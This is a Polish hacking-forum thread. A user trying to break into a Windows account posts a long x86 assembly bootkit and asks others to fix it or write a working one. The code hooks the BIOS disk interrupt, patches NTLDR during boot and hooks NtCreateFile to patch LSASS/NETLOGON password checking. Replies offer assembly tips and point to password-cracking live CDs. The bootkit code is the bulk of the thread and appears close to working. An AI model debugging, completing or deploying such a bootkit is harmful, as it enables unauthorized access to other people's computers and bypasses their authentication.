Pokaż wyniki 1 do 8 z 8

Temat: Windows - Pominięcie podawania hasła

 1. #1

  Domyślnie Windows - Pominięcie podawania hasła

  To mój pierwszy post na tym forum, więc witam wszystkich.
  Od tygodnia próbuję znaleść sposób na złamanie hasła do konta systemu Windows. Dostałem hash hasła, więc spróbowałem metody BruteForce (jest ona jednak stanowczo za długa). Próbowałem też przy pomocy tęczowych tablic, jednak jeden serwis nie działał, inny chciał aby zapłacić.

  Stwierdziłem więc, że poszukam rozwiązania bardziej uniwersalnego niż rozsyfrowywanie hash'y. Znalazłem ten oto artykuł.

  Przeczytałem cały, napisałem source code opisanego programu, po skompilowaniu zajmuje on 580 bajtów, a powinien 512. Nie jestem dobry z Assemblera, więc ciężko mi stwierdzić gdzie popełniłem błąd.

  Czy mógłby ktoś spojrzeć na to fachowym okiem ? Z góry wielkie dzięki

  Source:
  Kod:
  ; [1]
  TEMP_STACK equ 0x3000
  BOOTCODE_ADDR equ 0x4000-0x200
  MBR_ADDR equ 0x7C00
  INT13_ADDR equ 13h * 4
  [bits 16]
  [org BOOTCODE_ADDR]
  start:
  jmp 0:MBR_ADDR+5
  ; [2]
  mov cx, TEMP_STACK
  mov ss, cx
  xor cx, cx
  mov sp, cx
  mov ds, cx
  mov es, cx
  ; [3]
  pushad
  mov ax, 0201h
  inc ecx
  cwd
  mov bx, BOOTCODE_ADDR
  int 13h
  jmp _HOOK_INTERRUPT_GOTO_MBR - MBR_ADDR + BOOTCODE_ADDR
  _HOOK_INTERRUPT_GOTO_MBR:
  ; [4]
  mov ax, 0201h
  or dl, 10000000b
  mov bh, (MBR_ADDR>>8)
  int 13h
  ; [5]
  mov eax, [INT13_ADDR]
  mov [INT13HANDLER], eax
  mov dword [INT13_ADDR], @INT13HOOK_OFF
  ; [6]
  popad
  jmp MBR_ADDR
  
  NT_CREATE_FILE_HOOK_START equ $
  @NtCreateFileHook:
  pushfd
  pushad
  mov eax, [esp+030h]
  mov eax, [eax+8]
  cmp word [eax], 34
  jnz _LeaveTheHook
  mov edi, dword 0
  _DosStubHookAddr equ $-4
  add edi, _SearchedLsaString - NT_CREATE_FILE_HOOK_END
  mov esi, [eax+4]
  mov ecx, NT_CREATE_FILE_HOOK_END - _SearchedLsaString
  repe cmpsb
  test ecx, ecx
  jnz _LeaveTheHook
  push eax
  mov eax, CR0
  and eax, 0FFFEFFFFh
  mov CR0, eax
  pop eax
  mov word [077C699B9h], 9090h
  push eax
  mov eax, CR0
  or eax, 10000h
  mov CR0, eax
  pop eax
  mov eax, 0xC0DEC0DE
  _NtCreateFileSyscallAddrFirst equ $-4
  mov dword [eax], 08B55FF8Bh
  mov byte [eax+4], 0ECh
  _LeaveTheHook:
  popad
  popf
  push ebp
  mov ebp, esp
  push dword 0xDEADBEEF
  _NtCreateFileSyscallAddrSecond equ $-4
  add dword [esp], 5
  ret
  _SearchedLsaString db '\',0,'?',0,'?',0,'\',0,'P',0,'I',0,'P',0,'E',0,'\',0,'N',0,'E',0,'T',0,'L',0,'O',0,'G',0,'O',0,'N',0,0,0
  NT_CREATE_FILE_HOOK_END equ $
  
  GetExportedFuncAddr:
  xor eax, eax
  mov ecx, [ebx+3Ch] ; RVA of PE header
  mov ebp, [ebx+ecx+78h] ; RVA of export directory
  add ebp, ebx ; ptr to export directory
  xor ecx, ecx ; iterator
  mov edx, [ebp+1Ch] ; IMAGE_EXPORT_DIRECTORY::AddressOfFunctions
  mov edi, [ebp+20h] ; IMAGE_EXPORT_DIRECTORY::AddressOfNames
  mov eax, [ebp+24h] ; IMAGE_EXPORT_DIRECTORY::AddressOfNameOrdinals
  ; turn these values into VAs
  add edi, ebx
  add edx, ebx
  add eax, ebx
  @search_loop:
  mov esi, [edi+4*ecx] ; get the current function's name
  add esi, ebx ; and make a virtual address from it
  cmp ecx, [ebp+18h] ; check if there are no more functions exported
  jge _retloc
  inc ecx
  cmp dword [esi], 07243744eh ; "NtCr"
  jnz @search_loop
  cmp dword [esi+4], 065746165h ; "eate"
  jnz @search_loop
  cmp dword [esi+8], 0656c6946h ; "File"
  jnz @search_loop
  dec ecx ; ecx <--- function ID in export table
  movzx eax, word [eax+ecx*2] ; eax <--- function ordinal
  mov eax, dword [edx+eax*4] ; eax <--- function address
  add eax, ebx
  _retloc:
  ret
  
  @INT13HOOK_OFF equ $
  @Int13Hook:
  cli
  pushf
  cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
  je short @Int13Hook_ReadRequest
  cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
  je short @Int13Hook_ReadRequest
  popf
  db 0EAh ; JMP FAR INT13HANDLER
  INT13HANDLER EQU $
  dd 0
  @Int13Hook_ReadRequest:
  mov [cs:INT13LASTFUNCTION], ah
  ;
  ; Invoke original handler to perform read operation
  ;
  popf
  pushf ; push Flags because we're simulating an INT
  call far [cs:INT13HANDLER] ; call original handler
  jc short @Int13Hook_ret ; abort immediately if read failed
  pushf
  cli
  push es
  pusha
  ;
  ; Adjust registers to emulate an AH=02h read if AH=42h was used
  ;
  mov ah, 00h
  INT13LASTFUNCTION EQU $-1
  cmp ah, 42h
  jne short @Int13Hook_notextread
  lodsw
  lodsw ; 02h WORD number of blocks to transfer
  les bx, [si] ; 04h DWORD transfer buffer
  @Int13Hook_notextread:
  ;
  ; Scan sector for a signature of the code we want to modify
  ;
  test al, al
  jle short @Int13Hook_scan_done
  cld
  mov cl, al
  mov al, 8Bh
  shl cx, 9 ; (AL * 200h)
  mov di, bx
  @Int13Hook_scan_loop:
  ; 8B F0 MOV ESI, EAX
  ; 85 F6 TEST ESI, ESI
  ; 74 21 JZ $+23h
  ; 80 3D ... CMP BYTE PTR [ofs32], imm8
  ; (the first 6 bytes of this signature exist in other modules!)
  repne scasb
  jne short @Int13Hook_scan_done
  ; NOTE!
  ; The patched NTLDR code is placed at 0x422a6f
  ; on the up-to-date Windows XP SP2 version.
  cmp dword [es:di], 74F685F0h
  jne short @Int13Hook_scan_loop
  cmp word [es:di+4], 8021h
  jne short @Int13Hook_scan_loop
  mov word [es:di-1], 15FFh ; FFh/15h: CALL NEAR [ofs32]
  mov dword [es:di+1], @SyscallHookAddr
  @Int13Hook_scan_done:
  popa
  pop es
  popf
  @Int13Hook_ret:
  retf 2 ; discard saved Flags from original INT (pass back CF, etc.)
  
  @SyscallHookAddr dd @HookSyscall
  @HookSyscall:
  pushfd
  pushad
  cld
  mov edi, [esp+24h]
  and edi, 0FFF00000h
  mov al, 0C7h
  @PatchFunction_mlsigloop:
  scasb
  jne short @PatchFunction_mlsigloop
  cmp dword [edi], 40003446h
  jne short @PatchFunction_mlsigloop
  mov al, 0A1h
  @PatchFunction_mlbaseloop:
  scasb
  jne short @PatchFunction_mlbaseloop
  mov esi, [edi]
  mov esi, [esi]
  lodsd
  mov ebx, [eax+18h]
  call GetExportedFuncAddr
  mov dword [_NtCreateFileSyscallAddrFirst], eax
  mov dword [_NtCreateFileSyscallAddrSecond], eax
  add ebx, 40h
  mov dword [_DosStubHookAddr] , ebx
  mov byte [eax], 0E9h
  inc eax
  mov ecx, eax
  neg ecx
  lea edx, [ebx+ecx-5+1]
  mov dword [eax], edx
  mov edi, ebx ; edi
  mov esi, NT_CREATE_FILE_HOOK_START
  mov ecx, NT_CREATE_FILE_HOOK_END - NT_CREATE_FILE_HOOK_START
  rep movsb
  popad
  popf
  mov esi, eax
  test eax, eax
  jnz _no_cond_jmp
  _cond_jmp:
  add dword [esp], 21h
  _no_cond_jmp:
  Ret

 2. #2

  Domyślnie

  jak odwolujesz sie do pamieci uzywaj prefixow segmektowych.

  x86 dal dziala i nic z tym nie zrobisz.

  mov eax,[ds:0x1234]


  nie uzywaj pushad/popad. bo nie.

  jak deklarujesz stringi utf16 uzywaj du a nie db.

  nie uzywaj rep** ***. przezytek, lepiej petelka. czyli lodsw, cmpsb i cala reszta 'tego'.


  powinienes dbac o alignment jak kopiujesz hookproca:

  align XX
  start:
  ...
  align XX
  end:


  XX to tryb w jakim dziala cpu obslugujac ten kod.
  cmp dword [esi+8], 0656c6946h ; "File"


  hmmm.... rozumiem ze ciezko o basolutny adres w hookprocu, ale nie powienes tak robic.

  niech hookproc wyglada tak:
  kod + dane
  reloc

  reloc zawiera adresy wszsytkich bezwzglednych adresow (nie instrukcji) do ktorych dodajesz base po zaladowaniu. poczatkowo te adresy powinny zawieracrva wzgledem pocztaku hookproca.
  po zaladowaniu dodajesz adres pod jaki trafily i mozesz sie do nich odwolac.


  zdecyduj sie piszesz 0x1234 czy 01234h.

 3. #3

  Domyślnie

  Dziękuję za wszystkie porady. Jednak programować potrafię niestety, tylko w językach wysokiego poziomu jak C++, C# lub VB. Jak tylko znajdę troszkę czasu, to zacznę przerabiać jakiś kurs Assemblera. Zajmie mi to jednak pewnie dość sporo czasu, nawet przy dobrej znajomości innych języków. Więc to o co teraz poprosze może się wydać 'troche' lamerskie, ale czy mógłby ktoś poprawić mi ten kod ? Albo w ogóle napisać podobny program...
  Byłbym wdzięczny, tym bardziej że w tym przypadku liczy się każdy dzień.
  PS. Spróbuję jeszcze rozdzielić pracę BruteForce po 8 godzin i puszczać na noc.

 4. #4

  Domyślnie

  powiedz mi co ten kod ma robic, to *MOZE* ci napisze inny dzialajacy.

 5. #5

  Domyślnie

  Więc tak:
  zadaniem tego kodu jest, aby wykorzystując luki zaistniałe faktem jeszcze nie w pełni wczytanego systemu, przejąć kontrolnę nad odpowiednimi procesami. Głównym celem jest proces LSASS odpowiedzialny za zabezpieczenia Windows.

  Dokładny opis znajduje się pod TYM adresem.

  Tu nawet nie trzeba zbytnio niczego samemu wymyślać, tylko złożyć już to co jest zawarte w tych fragmentach... (i właśnie tutaj mam problem, bo nie zadobrze orientuje się w kodzie Assemblera)

 6. #6
  Zarejestrowany
  Jul 2007
  Skąd
  UK
  Postów
  360

  Domyślnie

  O ile chodzi Ci tylko o ominieci hasla sciagnij gotowe iso i po problemie.
  Ostatnio edytowane przez bemyself : 01-09-2010 - 13:53
  Atheros? - nanzwa mhata yangu

 7. #7

  Domyślnie

  Problem w tym, że wszędzie na forach, albo nikt nie udziela takiej pomocy, albo są porponowane sposoby na usunięcie hasła. Gdybym chciał je usunąć to zrobiłbym to już dawno. A ja chcę wejść do systemu bez usuwania tego hasła. Jeżeli ktoś znalazł taki plik iso gdzieś w internecie, to bardzo proszę o podanie linku. (ew. napisanie tego kodu w Asseblerze)
  Ostatnio edytowane przez paurin : 01-09-2010 - 15:48

 8. #8

  Domyślnie

  jka nie możesz tak to poprostu wrzuć livecd
  http://ophcrack.sourceforge.net/

Podobne wątki

 1. Odpowiedzi: 18
  Autor: 12-05-2009, 21:18
 2. Łamanie hasła phpBB. Mając hasła na panel administracyjny.
  By ONAA in forum Newbie - dla początkujących!
  Odpowiedzi: 10
  Autor: 02-06-2009, 17:46
 3. hasła
  By ciekawostka in forum Hardware Hacking
  Odpowiedzi: 3
  Autor: 01-22-2009, 14:05
 4. Odpowiedzi: 3
  Autor: 09-09-2007, 14:39
 5. Hasła
  By Michal_sh in forum Hacking
  Odpowiedzi: 18
  Autor: 08-05-2007, 23:19

Tagi

Zasady Postowania

 • Nie możesz zakładać nowych tematów
 • Nie możesz pisać wiadomości
 • Nie możesz dodawać załączników
 • Nie możesz edytować swoich postów
 •  
Subskrybuj